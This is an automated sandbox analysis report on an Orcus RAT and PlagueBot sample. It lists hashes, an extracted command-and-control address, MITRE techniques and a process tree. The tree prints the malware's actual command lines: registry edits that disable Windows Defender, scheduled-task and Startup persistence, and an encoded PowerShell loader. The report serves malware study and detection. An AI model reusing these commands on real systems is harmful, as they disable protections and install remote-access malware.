orcus | 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2022 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Size

100KB
MD5

b7756f9d9e8c5f4ba2c930adb666fbae
SHA1

8ddb9f2a559f6af5ccaa04c8b5b589d216357340
SHA256

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b
SHA512

c5c85c86251c34530b672de0feee38bd148cddd53beb7191a250f09e6d504460c343a0f608e2002434e4b98585e61222f44bc159bfb2a340c0e73a3941bef67f
SSDEEP

1536:DQIAibOVOk3udovOyePC9Eop2h90L64QG9iDCzPgQD8Kg90a//MudDBG:DQ/ibOcIudovOy8CUwIOkCzgQq0UzxM

Score

10^/10

orcus plaguebot botnet evasion persistence rat spyware stealer trojan

Malware Config

Extracted

Family

orcus

146.70.143.176:81

Mutex

712d31c7a3f54904a08d968a15b836e9

Attributes

autostart_method
Registry
enable_keylogger
false
install_path
%programfiles%\orc\orc.exe
reconnect_delay
10000
registry_keyname
orc
taskscheduler_taskname
orc
watchdog_path
AppData\Watchdog.exe

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\WinDefend\Start = "4"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Orcus main payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\orc.exe	family_orcus
C:\Users\Admin\AppData\Local\Temp\orc.exe	family_orcus
C:\Program Files\orc\orc.exe	family_orcus
C:\Program Files\orc\orc.exe	family_orcus
C:\Program Files\orc\orc.exe	family_orcus

PlagueBot
PlagueBot is an open source Bot written in Pascal.
botnet plaguebot

Orcurs Rat Executable 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\orc.exe	orcus
C:\Users\Admin\AppData\Local\Temp\orc.exe	orcus
C:\Program Files\orc\orc.exe	orcus
C:\Program Files\orc\orc.exe	orcus
behavioral1/memory/3960-184-0x0000000000150000-0x000000000023A000-memory.dmp	orcus
C:\Program Files\orc\orc.exe	orcus

PlagueBot Executable 7 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\plage.exe	plaguebot
C:\Users\Admin\Downloads\plage.exe	plaguebot
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe	plaguebot
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe	plaguebot
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe	plaguebot
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe	plaguebot
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe	plaguebot

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
20	3148	powershell.exe
31	3148	powershell.exe
38	3148	powershell.exe
45	3148	powershell.exe
48	3148	powershell.exe
51	3148	powershell.exe
53	3148	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

Processes:

FILE.exeorc.exeplage.exewinmgr.exeWindowsInput.exeWindowsInput.exeorc.exeWatchdog.exeorc.exeWatchdog.exewinmgr.exeDefaultDomainwinmgr.exewinmgr.exe

pid	process
2736	FILE.exe
4584	orc.exe
4652	plage.exe
804	winmgr.exe
4592	WindowsInput.exe
3608	WindowsInput.exe
3960	orc.exe
640	Watchdog.exe
1556	orc.exe
2848	Watchdog.exe
4216	winmgr.exe
3060	DefaultDomain
3652	winmgr.exe
4244	winmgr.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

plage.exeorc.exeWScript.exeorc.exeWatchdog.exe57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exeFILE.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	plage.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	orc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	orc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Watchdog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	FILE.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "4"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

orc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\orc = "\"C:\\Program Files\\orc\\orc.exe\""	orc.exe

Drops desktop.ini file(s) 2 IoCs

Processes:

orc.exe

description ioc process

File created C:\Windows\assembly\Desktop.ini orc.exe
File opened for modification C:\Windows\assembly\Desktop.ini orc.exe

description	ioc	process
File created	C:\Windows\assembly\Desktop.ini	orc.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	orc.exe

Drops file in System32 directory 3 IoCs

Processes:

orc.exeWindowsInput.exe

description	ioc	process
File created	C:\Windows\SysWOW64\WindowsInput.exe	orc.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe.config	orc.exe
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe

Drops file in Program Files directory 3 IoCs

Processes:

orc.exe

description	ioc	process
File created	C:\Program Files\orc\orc.exe	orc.exe
File opened for modification	C:\Program Files\orc\orc.exe	orc.exe
File created	C:\Program Files\orc\orc.exe.config	orc.exe

Drops file in Windows directory 3 IoCs

Processes:

orc.exe

description	ioc	process
File opened for modification	C:\Windows\assembly	orc.exe
File created	C:\Windows\assembly\Desktop.ini	orc.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	orc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2660 schtasks.exe
4164 schtasks.exe
1944 schtasks.exe

pid	process
2660	schtasks.exe
4164	schtasks.exe
1944	schtasks.exe

Modifies registry class 1 IoCs

Processes:

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeorc.exeWatchdog.exeDefaultDomain

pid	process
4924	powershell.exe
4924	powershell.exe
4164	powershell.exe
4164	powershell.exe
2544	powershell.exe
3148	powershell.exe
2544	powershell.exe
3148	powershell.exe
3960	orc.exe
3960	orc.exe
2848	Watchdog.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3060	DefaultDomain
3060	DefaultDomain
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe
3960	orc.exe
2848	Watchdog.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exepowershell.exepowershell.exepowershell.exepowershell.exeWatchdog.exeWatchdog.exeorc.exeDefaultDomain

description	pid	process
Token: SeTakeOwnershipPrivilege	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Token: SeRestorePrivilege	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Token: SeSecurityPrivilege	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeDebugPrivilege	640	Watchdog.exe
Token: SeDebugPrivilege	2848	Watchdog.exe
Token: SeDebugPrivilege	3960	orc.exe
Token: SeDebugPrivilege	3060	DefaultDomain

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

3148 powershell.exe

pid	process
3148	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exeFILE.exeplage.exeorc.execsc.exeWScript.exeorc.exepowershell.exeWatchdog.exe

description	pid	process	target process
PID 2172 wrote to memory of 4924	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	powershell.exe
PID 2172 wrote to memory of 4924	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	powershell.exe
PID 2172 wrote to memory of 1944	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	schtasks.exe
PID 2172 wrote to memory of 1944	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	schtasks.exe
PID 2172 wrote to memory of 4164	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	powershell.exe
PID 2172 wrote to memory of 4164	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	powershell.exe
PID 2172 wrote to memory of 2736	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	FILE.exe
PID 2172 wrote to memory of 2736	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	FILE.exe
PID 2172 wrote to memory of 2736	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	FILE.exe
PID 2172 wrote to memory of 3340	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	WScript.exe
PID 2172 wrote to memory of 3340	2172	57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe	WScript.exe
PID 2736 wrote to memory of 4584	2736	FILE.exe	orc.exe
PID 2736 wrote to memory of 4584	2736	FILE.exe	orc.exe
PID 2736 wrote to memory of 4652	2736	FILE.exe	plage.exe
PID 2736 wrote to memory of 4652	2736	FILE.exe	plage.exe
PID 2736 wrote to memory of 4652	2736	FILE.exe	plage.exe
PID 4652 wrote to memory of 2660	4652	plage.exe	schtasks.exe
PID 4652 wrote to memory of 2660	4652	plage.exe	schtasks.exe
PID 4652 wrote to memory of 2660	4652	plage.exe	schtasks.exe
PID 4584 wrote to memory of 4508	4584	orc.exe	csc.exe
PID 4584 wrote to memory of 4508	4584	orc.exe	csc.exe
PID 4652 wrote to memory of 4760	4652	plage.exe	schtasks.exe
PID 4652 wrote to memory of 4760	4652	plage.exe	schtasks.exe
PID 4652 wrote to memory of 4760	4652	plage.exe	schtasks.exe
PID 4508 wrote to memory of 436	4508	csc.exe	cvtres.exe
PID 4508 wrote to memory of 436	4508	csc.exe	cvtres.exe
PID 4652 wrote to memory of 804	4652	plage.exe	winmgr.exe
PID 4652 wrote to memory of 804	4652	plage.exe	winmgr.exe
PID 4652 wrote to memory of 804	4652	plage.exe	winmgr.exe
PID 4584 wrote to memory of 4592	4584	orc.exe	WindowsInput.exe
PID 4584 wrote to memory of 4592	4584	orc.exe	WindowsInput.exe
PID 3340 wrote to memory of 2544	3340	WScript.exe	powershell.exe
PID 3340 wrote to memory of 2544	3340	WScript.exe	powershell.exe
PID 3340 wrote to memory of 3148	3340	WScript.exe	powershell.exe
PID 3340 wrote to memory of 3148	3340	WScript.exe	powershell.exe
PID 4584 wrote to memory of 3960	4584	orc.exe	orc.exe
PID 4584 wrote to memory of 3960	4584	orc.exe	orc.exe
PID 3960 wrote to memory of 640	3960	orc.exe	Watchdog.exe
PID 3960 wrote to memory of 640	3960	orc.exe	Watchdog.exe
PID 3960 wrote to memory of 640	3960	orc.exe	Watchdog.exe
PID 3148 wrote to memory of 4164	3148	powershell.exe	schtasks.exe
PID 3148 wrote to memory of 4164	3148	powershell.exe	schtasks.exe
PID 640 wrote to memory of 2848	640	Watchdog.exe	Watchdog.exe
PID 640 wrote to memory of 2848	640	Watchdog.exe	Watchdog.exe
PID 640 wrote to memory of 2848	640	Watchdog.exe	Watchdog.exe

C:\Users\Admin\AppData\Local\Temp\57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
"C:\Users\Admin\AppData\Local\Temp\57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Windows security modification
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2736

C:\Users\Admin\AppData\Local\Temp\orc.exe
"C:\Users\Admin\AppData\Local\Temp\orc.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0uqbs3k.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4508

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA195.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA194.tmp"
5⤵
PID:436

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe" --install
4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4592

C:\Program Files\orc\orc.exe
"C:\Program Files\orc\orc.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960

C:\Users\Admin\AppData\Roaming\Watchdog.exe
"C:\Users\Admin\AppData\Roaming\Watchdog.exe" /launchSelfAndExit "C:\Program Files\orc\orc.exe" 3960 /protectFile
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640

C:\Users\Admin\AppData\Roaming\Watchdog.exe
"C:\Users\Admin\AppData\Roaming\Watchdog.exe" /watchProcess "C:\Program Files\orc\orc.exe" 3960 "/protectFile"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Users\Admin\Downloads\plage.exe
"C:\Users\Admin\Downloads\plage.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /TN "WinManager" /XML "C:\Users\Admin\AppData\Local\Temp\NewTask.xml"
4⤵
- Creates scheduled task(s)
PID:2660

C:\Windows\SysWOW64\schtasks.exe
schtasks /Query /FO "LIST" /TN "WinManager"
4⤵
PID:4760

C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
"C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe" /wait
4⤵
- Executes dropped EXE
PID:804

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp8F25.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -window 1 Copy-Item 'C:\Users\Admin\AppData\Local\Temp\tmp8F25.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nitro64.vbs';
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABuAGkAdAByAG8ANgA0AFwAKQAuAG4AaQB0AHIAbwA2ADQAKQA7ACAAJAB0AGUAeAB0ACAAPQAgAC0AagBvAGkAbgAgACQAdABlAHgAdABbAC0AMQAuAC4ALQAkAHQAZQB4AHQALgBMAGUAbgBnAHQAaABdADsAIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAZQB4AHQAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABOAHUAbABsACwAJABOAHUAbABsACkAOwA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3148

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "nitro64" /tr "C:\Users\Admin\AppData\Local\DefaultDomain"
4⤵
- Creates scheduled task(s)
PID:4164

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
1⤵
- Executes dropped EXE
PID:3608

C:\Program Files\orc\orc.exe
"C:\Program Files\orc\orc.exe"
1⤵
- Executes dropped EXE
PID:1556

C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
1⤵
- Executes dropped EXE
PID:4216

C:\Users\Admin\AppData\Local\DefaultDomain
C:\Users\Admin\AppData\Local\DefaultDomain
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
1⤵
- Executes dropped EXE
PID:3652

C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
1⤵
- Executes dropped EXE
PID:4244

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\orc\orc.exe
Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Program Files\orc\orc.exe
Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Program Files\orc\orc.exe
Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Program Files\orc\orc.exe.config
Filesize
357B

MD5
a2b76cea3a59fa9af5ea21ff68139c98

SHA1
35d76475e6a54c168f536e30206578babff58274

SHA256
f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

SHA512
b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

Download Submit
C:\Users\Admin\AppData\Local\DefaultDomain
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Temp\NewTask.xml
Filesize
1KB

MD5
8efaecee35e41252bfef883749ad0da2

SHA1
e6a374735d5f098346e039681ca04f3f09f04308

SHA256
adaafb2f2714829e021f97ab30acc442970b8665dece9cbbef04efae83e8df46

SHA512
0bc15465df92041b66c34874bcdfaa5d15df828f389f1ea44b476db4dc54df462b6e1bd0df3920ec44cc623d5d75101dd0846474d473e71716791ebd82c5a73c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA195.tmp
Filesize
1KB

MD5
dcf0e0fcb124f5422d50a83864d43f6d

SHA1
2f8fb0aaa001cee674e7e7d8c1d10a4ac2952e62

SHA256
07a7cadd334d713435bd996f7d0b52b71362baea3a1f17b8e3a800081a974345

SHA512
